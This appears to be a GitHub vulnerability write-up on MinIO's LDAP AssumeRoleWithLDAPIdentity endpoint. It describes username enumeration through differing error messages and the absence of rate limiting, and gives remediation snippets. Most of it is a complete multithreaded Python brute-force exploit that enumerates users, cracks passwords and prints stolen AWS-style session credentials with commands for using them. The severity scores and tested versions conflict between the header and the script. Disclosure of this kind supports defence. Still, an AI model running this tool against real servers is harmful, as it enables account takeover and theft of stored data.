Skip to content

Latest commit

 

History

History
565 lines (450 loc) · 22.3 KB

File metadata and controls

565 lines (450 loc) · 22.3 KB

MinIO LDAP Authentication Brute Force Vulnerability

Summary

Field Value
Vendor MinIO, Inc.
Product MinIO Object Storage
Affected Versions All versions with LDAP identity provider enabled
Tested Version RELEASE.2025-10-15T17-29-55Z
Vulnerability Type Authentication Bypass via Brute Force
CWE CWE-307 (Improper Restriction of Excessive Authentication Attempts)
CVSS 4.0 9.1 (Critical)
CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
GitHub https://github.com/minio/minio

Description

MinIO's STS (Security Token Service) LDAP authentication endpoint (AssumeRoleWithLDAPIdentity) contains two vulnerabilities that, when combined, allow unauthenticated attackers to compromise LDAP user accounts:

  1. User Enumeration: Distinct error messages reveal whether a username exists
  2. No Rate Limiting: Unlimited authentication attempts without throttling or lockout

Successful exploitation grants attackers temporary AWS-style credentials (AccessKeyId/SecretAccessKey/SessionToken) with full access to the victim's S3 buckets.

Affected Endpoint

POST /?Action=AssumeRoleWithLDAPIdentity&Version=2011-06-15
     &LDAPUsername=<username>&LDAPPassword=<password>

Technical Analysis

Vulnerability 1: User Enumeration

File: cmd/sts-handlers.go + internal/config/identity/ldap/ldap.go

The LDAP authentication returns different error messages based on whether the user exists:

// internal/config/identity/ldap/ldap.go:247
lookupResult, err := l.LDAP.LookupUsername(conn, username)
if err != nil {
    // User does not exist - reveals username validity
    errRet := fmt.Errorf("Unable to find user DN: %w", err)
    return nil, nil, errRet
}

err = conn.Bind(lookupResult.ActualDN, password)
if err != nil {
    // User exists but wrong password - different error message
    errRet := fmt.Errorf("LDAP auth failed for DN %s: %w", lookupResult.ActualDN, err)
    return nil, nil, errRet
}

Response Difference:

  • Non-existent user: "User DN not found for: <username>"
  • Valid user, wrong password: "LDAP auth failed for DN <dn>: Invalid Credentials"

Vulnerability 2: Missing Rate Limiting

File: cmd/sts-handlers.go:667

The STS handler processes authentication requests without any rate limiting:

// cmd/sts-handlers.go:667
func (sts *stsAPIHandlers) AssumeRoleWithLDAPIdentity(w http.ResponseWriter, r *http.Request) {
    ctx := newContext(r, w, "AssumeRoleWithLDAPIdentity")

    // No rate limiting check here
    // No account lockout mechanism
    // No IP-based throttling

    if err := parseForm(r); err != nil {
        writeSTSErrorResponse(ctx, w, ErrSTSInvalidParameterValue, err)
        return
    }

    ldapUsername := r.Form.Get(stsLDAPUsername)
    ldapPassword := r.Form.Get(stsLDAPPassword)
    // Authentication proceeds without any brute-force protection
}

Exploitation

Attack Flow

┌──────────────────┐     ┌──────────────────┐     ┌──────────────────┐
│ User Enumeration │────▶│ Password Brute   │────▶│ Obtain STS       │
│ via Error Msgs   │     │ Force (No Limit) │     │ Credentials      │
└──────────────────┘     └──────────────────┘     └──────────────────┘

Proof of Concept

#!/usr/bin/env python3
"""
=============================================================================
MinIO LDAP Authentication Brute Force via User Enumeration + No Rate Limiting
=============================================================================

CVE ID:         [PENDING]
Vendor:         MinIO, Inc.
Product:        MinIO Object Storage
Affected:       All versions with LDAP identity provider enabled
                Tested on: RELEASE.2025-09-07T16-13-09Z
CVSSv4.0:       7.5 (High)
Vector:         CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

=============================================================================
VULNERABILITY SUMMARY
=============================================================================

MinIO's STS (Security Token Service) LDAP authentication endpoint is
vulnerable to user enumeration (CWE-204) and lacks rate limiting (CWE-307),
allowing attackers to:

1. Enumerate valid LDAP usernames via distinct error messages
2. Perform unlimited password brute-force attacks
3. Obtain temporary AWS-style credentials (AccessKey/SecretKey/SessionToken)
4. Access S3 buckets with the compromised user's permissions

=============================================================================
PROOF OF CONCEPT
=============================================================================

Author:         Security Researcher
Date:           2026-03-12
Disclaimer:     For authorized security testing only.

Usage:
    python3 CVE_POC_MINIO_LDAP_BRUTEFORCE.py -t https://minio.example.com:9000 -U users.txt -P passwords.txt
    python3 CVE_POC_MINIO_LDAP_BRUTEFORCE.py -t http://localhost:9000 -U users.txt -P passwords.txt --threads 20

=============================================================================
"""

import argparse
import requests
import urllib3
import sys
import re
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass
from typing import List, Optional, Tuple
from datetime import datetime

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class Colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    CYAN = '\033[96m'
    WHITE = '\033[97m'
    BOLD = '\033[1m'
    END = '\033[0m'


@dataclass
class Credentials:
    access_key: str
    secret_key: str
    session_token: str
    expiration: str


@dataclass
class ExploitResult:
    username: str
    password: str
    credentials: Credentials
    timestamp: str


class MinIOLDAPExploit:
    """
    MinIO LDAP Authentication Exploit
    Combines CWE-204 (User Enumeration) and CWE-307 (No Rate Limiting)
    """

    BANNER = f"""
{Colors.CYAN}╔════════════════════════════════════════════════════════════════════════════╗
{Colors.RED}███╗   ███╗██╗███╗   ██╗██╗ ██████╗     ██████╗ ██████╗  ██████╗{Colors.CYAN}
{Colors.RED}████╗ ████║██║████╗  ██║██║██╔═══██╗    ██╔══██╗██╔═══██╗██╔════╝{Colors.CYAN}
{Colors.RED}██╔████╔██║██║██╔██╗ ██║██║██║   ██║    ██████╔╝██║   ██║██║     {Colors.CYAN}
{Colors.RED}██║╚██╔╝██║██║██║╚██╗██║██║██║   ██║    ██╔═══╝ ██║   ██║██║     {Colors.CYAN}
{Colors.RED}██║ ╚═╝ ██║██║██║ ╚████║██║╚██████╔╝    ██║     ╚██████╔╝╚██████╗{Colors.CYAN}
{Colors.RED}╚═╝     ╚═╝╚═╝╚═╝  ╚═══╝╚═╝ ╚═════╝     ╚═╝      ╚═════╝  ╚═════╝{Colors.CYAN}
{Colors.WHITE}LDAP Authentication Brute Force Exploit{Colors.CYAN}
╚════════════════════════════════════════════════════════════════════════════╝{Colors.END}
"""

    def __init__(self, target_url: str, verify_ssl: bool = False,
                 timeout: int = 10, threads: int = 10, verbose: bool = False):
        self.target_url = target_url.rstrip('/')
        self.verify_ssl = verify_ssl
        self.timeout = timeout
        self.threads = threads
        self.verbose = verbose
        self.session = requests.Session()
        self.session.verify = verify_ssl

        self.stats = {
            'requests': 0,
            'enumerated_users': 0,
            'valid_users': [],
            'cracked_credentials': [],
            'start_time': None,
            'end_time': None
        }
        self._lock = threading.Lock()

    def log(self, level: str, message: str):
        timestamp = datetime.now().strftime('%H:%M:%S')
        colors = {
            'INFO': Colors.BLUE,
            'SUCCESS': Colors.GREEN,
            'WARNING': Colors.YELLOW,
            'ERROR': Colors.RED,
            'DEBUG': Colors.CYAN
        }
        color = colors.get(level, Colors.WHITE)
        prefix = {
            'INFO': '[*]',
            'SUCCESS': '[+]',
            'WARNING': '[!]',
            'ERROR': '[-]',
            'DEBUG': '[D]'
        }
        print(f"{Colors.WHITE}[{timestamp}]{Colors.END} {color}{prefix.get(level, '[?]')}{Colors.END} {message}")

    def _make_ldap_request(self, username: str, password: str) -> Tuple[int, str]:
        params = {
            'Action': 'AssumeRoleWithLDAPIdentity',
            'Version': '2011-06-15',
            'LDAPUsername': username,
            'LDAPPassword': password
        }

        with self._lock:
            self.stats['requests'] += 1

        try:
            response = self.session.post(
                self.target_url,
                params=params,
                timeout=self.timeout
            )
            return response.status_code, response.text
        except requests.exceptions.Timeout:
            return -1, "TIMEOUT"
        except requests.exceptions.ConnectionError:
            return -2, "CONNECTION_ERROR"
        except Exception as e:
            return -3, str(e)

    def check_ldap_enabled(self) -> bool:
        self.log('INFO', f"Checking LDAP configuration on {self.target_url}")
        status, response = self._make_ldap_request('__probe__', '__probe__')

        if status == -2:
            self.log('ERROR', "Cannot connect to target")
            return False

        if 'User DN not found' in response or 'LDAP auth failed' in response:
            self.log('SUCCESS', "LDAP identity provider is ENABLED")
            return True

        self.log('WARNING', "LDAP may not be configured on this instance")
        return False

    def enumerate_users(self, usernames: List[str]) -> List[str]:
        """Phase 1: User Enumeration (CWE-204)"""
        self.log('INFO', f"Starting user enumeration with {len(usernames)} candidates")
        print(f"{Colors.CYAN}{'─' * 70}{Colors.END}")

        valid_users = []
        test_password = "CVE_PROBE_INVALID_PASSWORD_12345"

        for username in usernames:
            status, response = self._make_ldap_request(username, test_password)

            with self._lock:
                self.stats['enumerated_users'] += 1

            if status < 0:
                if self.verbose:
                    self.log('WARNING', f"Request failed for '{username}': {response}")
                continue

            response_lower = response.lower()

            if 'user dn not found' in response_lower or 'user not found' in response_lower:
                if self.verbose:
                    pass
            elif 'invalid credentials' in response_lower or 'ldap auth failed' in response_lower:
                self.log('SUCCESS', f"Valid user found: {Colors.GREEN}{Colors.BOLD}{username}{Colors.END}")
                valid_users.append(username)
            elif '<accesskeyid>' in response_lower:
                self.log('SUCCESS', f"User '{username}' authenticated with probe password!")
                valid_users.append(username)
            else:
                if self.verbose:
                    self.log('DEBUG', f"'{username}' - Unknown response")

        print(f"{Colors.CYAN}{'─' * 70}{Colors.END}")
        self.log('INFO', f"Enumeration complete: {len(valid_users)} valid users found")

        self.stats['valid_users'] = valid_users
        return valid_users

    def brute_force_user(self, username: str, passwords: List[str]) -> Optional[Tuple[str, str]]:
        """Phase 2: Password Brute Force (CWE-307)"""
        self.log('INFO', f"Brute-forcing '{username}' with {len(passwords)} passwords")

        found_password = None
        found_response = None

        def try_password(password: str) -> Optional[Tuple[str, str]]:
            status, response = self._make_ldap_request(username, password)
            if '<AccessKeyId>' in response:
                return (password, response)
            return None

        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            futures = {executor.submit(try_password, pwd): pwd for pwd in passwords}

            for future in as_completed(futures):
                result = future.result()
                if result:
                    found_password, found_response = result
                    for f in futures:
                        f.cancel()
                    break

        if found_password:
            return (found_password, found_response)
        return None

    def extract_credentials(self, response_xml: str) -> Optional[Credentials]:
        try:
            access_key = re.search(r'<AccessKeyId>([^<]+)</AccessKeyId>', response_xml)
            secret_key = re.search(r'<SecretAccessKey>([^<]+)</SecretAccessKey>', response_xml)
            session_token = re.search(r'<SessionToken>([^<]+)</SessionToken>', response_xml)
            expiration = re.search(r'<Expiration>([^<]+)</Expiration>', response_xml)

            if access_key and secret_key and session_token:
                return Credentials(
                    access_key=access_key.group(1),
                    secret_key=secret_key.group(1),
                    session_token=session_token.group(1),
                    expiration=expiration.group(1) if expiration else 'Unknown'
                )
        except Exception:
            pass
        return None

    def run(self, usernames: List[str], passwords: List[str]) -> List[ExploitResult]:
        """Execute full exploit chain"""
        print(self.BANNER)

        self.stats['start_time'] = datetime.now()

        self.log('INFO', f"Target: {Colors.BOLD}{self.target_url}{Colors.END}")
        self.log('INFO', f"Usernames: {len(usernames)} | Passwords: {len(passwords)} | Threads: {self.threads}")
        print()

        if not self.check_ldap_enabled():
            self.log('ERROR', "Target does not appear to have LDAP enabled. Aborting.")
            return []

        print()

        valid_users = self.enumerate_users(usernames)

        if not valid_users:
            self.log('WARNING', "No valid users found. Try a larger wordlist.")
            return []

        print()
        results = []

        for username in valid_users:
            print(f"{Colors.CYAN}{'─' * 70}{Colors.END}")

            result = self.brute_force_user(username, passwords)

            if result:
                password, response = result
                credentials = self.extract_credentials(response)

                if credentials:
                    self.log('SUCCESS', f"{Colors.GREEN}{Colors.BOLD}CREDENTIALS FOUND!{Colors.END}")
                    self.log('SUCCESS', f"Username: {Colors.BOLD}{username}{Colors.END}")
                    self.log('SUCCESS', f"Password: {Colors.BOLD}{password}{Colors.END}")
                    self.log('SUCCESS', f"AccessKeyId: {credentials.access_key}")
                    self.log('SUCCESS', f"SecretAccessKey: {credentials.secret_key[:20]}...")
                    self.log('SUCCESS', f"Expiration: {credentials.expiration}")

                    exploit_result = ExploitResult(
                        username=username,
                        password=password,
                        credentials=credentials,
                        timestamp=datetime.now().isoformat()
                    )
                    results.append(exploit_result)
                    self.stats['cracked_credentials'].append(exploit_result)
            else:
                self.log('WARNING', f"Could not crack password for '{username}'")

        self.stats['end_time'] = datetime.now()
        self._print_summary(results)

        return results

    def _print_summary(self, results: List[ExploitResult]):
        duration = (self.stats['end_time'] - self.stats['start_time']).total_seconds()

        print()
        print(f"{Colors.CYAN}{'═' * 68}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.WHITE}                         EXPLOIT SUMMARY                            {Colors.CYAN}{Colors.END}")
        print(f"{Colors.CYAN}{'═' * 68}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.END} Target:              {self.target_url:<45} {Colors.CYAN}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.END} Duration:            {duration:.2f} seconds{' ' * 34}{Colors.CYAN}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.END} Total Requests:      {self.stats['requests']:<45} {Colors.CYAN}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.END} Users Enumerated:    {self.stats['enumerated_users']:<45} {Colors.CYAN}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.END} Valid Users Found:   {len(self.stats['valid_users']):<45} {Colors.CYAN}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.END} Credentials Cracked: {Colors.GREEN if results else Colors.RED}{len(results):<45}{Colors.END} {Colors.CYAN}{Colors.END}")
        print(f"{Colors.CYAN}{'═' * 68}{Colors.END}")

        if results:
            print()
            print(f"{Colors.GREEN}{Colors.BOLD}[+] EXPLOIT SUCCESSFUL!{Colors.END}")
            print()
            print(f"{Colors.YELLOW}Compromised Credentials:{Colors.END}")
            for r in results:
                print(f"  • {r.username}:{r.password}")
                print(f"    AWS_ACCESS_KEY_ID={r.credentials.access_key}")
                print(f"    AWS_SECRET_ACCESS_KEY={r.credentials.secret_key}")
                print(f"    AWS_SESSION_TOKEN={r.credentials.session_token[:50]}...")
                print()

            print(f"{Colors.YELLOW}Usage Example:{Colors.END}")
            print(f"  export AWS_ACCESS_KEY_ID='{results[0].credentials.access_key}'")
            print(f"  export AWS_SECRET_ACCESS_KEY='{results[0].credentials.secret_key}'")
            print(f"  export AWS_SESSION_TOKEN='{results[0].credentials.session_token}'")
            print(f"  aws --endpoint-url {self.target_url} s3 ls")
        else:
            print()
            print(f"{Colors.RED}[-] No credentials were cracked.{Colors.END}")


def load_wordlist(filepath: str) -> List[str]:
    """Load wordlist from file"""
    try:
        with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
            return [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"Error: File not found: {filepath}")
        sys.exit(1)
    except Exception as e:
        print(f"Error loading {filepath}: {e}")
        sys.exit(1)


def main():
    parser = argparse.ArgumentParser(
        description='MinIO LDAP Authentication Brute Force Exploit',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s -t https://minio.example.com:9000 -U users.txt -P passwords.txt
  %(prog)s -t http://localhost:9000 -U users.txt -P passwords.txt --threads 20 -v
        """
    )

    parser.add_argument('-t', '--target', required=True,
                        help='Target MinIO URL (e.g., https://minio.example.com:9000)')
    parser.add_argument('-U', '--userlist', required=True,
                        help='File containing usernames (one per line)')
    parser.add_argument('-P', '--passlist', required=True,
                        help='File containing passwords (one per line)')
    parser.add_argument('-T', '--threads', type=int, default=10,
                        help='Number of threads for brute-force (default: 10)')
    parser.add_argument('--timeout', type=int, default=10,
                        help='Request timeout in seconds (default: 10)')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='Enable verbose output')
    parser.add_argument('-k', '--no-ssl-verify', action='store_true',
                        help='Disable SSL certificate verification')

    args = parser.parse_args()

    # Load wordlists
    usernames = load_wordlist(args.userlist)
    passwords = load_wordlist(args.passlist)

    print(f"[*] Loaded {len(usernames)} usernames from {args.userlist}")
    print(f"[*] Loaded {len(passwords)} passwords from {args.passlist}")

    # Initialize and run exploit
    exploit = MinIOLDAPExploit(
        target_url=args.target,
        verify_ssl=not args.no_ssl_verify,
        timeout=args.timeout,
        threads=args.threads,
        verbose=args.verbose
    )

    results = exploit.run(usernames=usernames, passwords=passwords)
    sys.exit(0 if results else 1)


if __name__ == '__main__':
    main()

Exploit Results Screenshot

poc

Impact

  • Confidentiality: HIGH - Attackers gain access to all S3 buckets/objects accessible by compromised users
  • Authentication Bypass: Complete bypass of LDAP authentication through credential theft
  • Lateral Movement: Stolen credentials can access any MinIO resource the user has permissions for

Remediation

  1. Implement Rate Limiting:
// Add rate limiter middleware
func rateLimitMiddleware(next http.Handler) http.Handler {
    limiter := rate.NewLimiter(rate.Every(time.Second), 5) // 5 req/sec
    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        if !limiter.Allow() {
            http.Error(w, "Too Many Requests", http.StatusTooManyRequests)
            return
        }
        next.ServeHTTP(w, r)
    })
}
  1. Standardize Error Messages:
// Return generic error for all auth failures
if err != nil {
    return nil, nil, fmt.Errorf("authentication failed")
}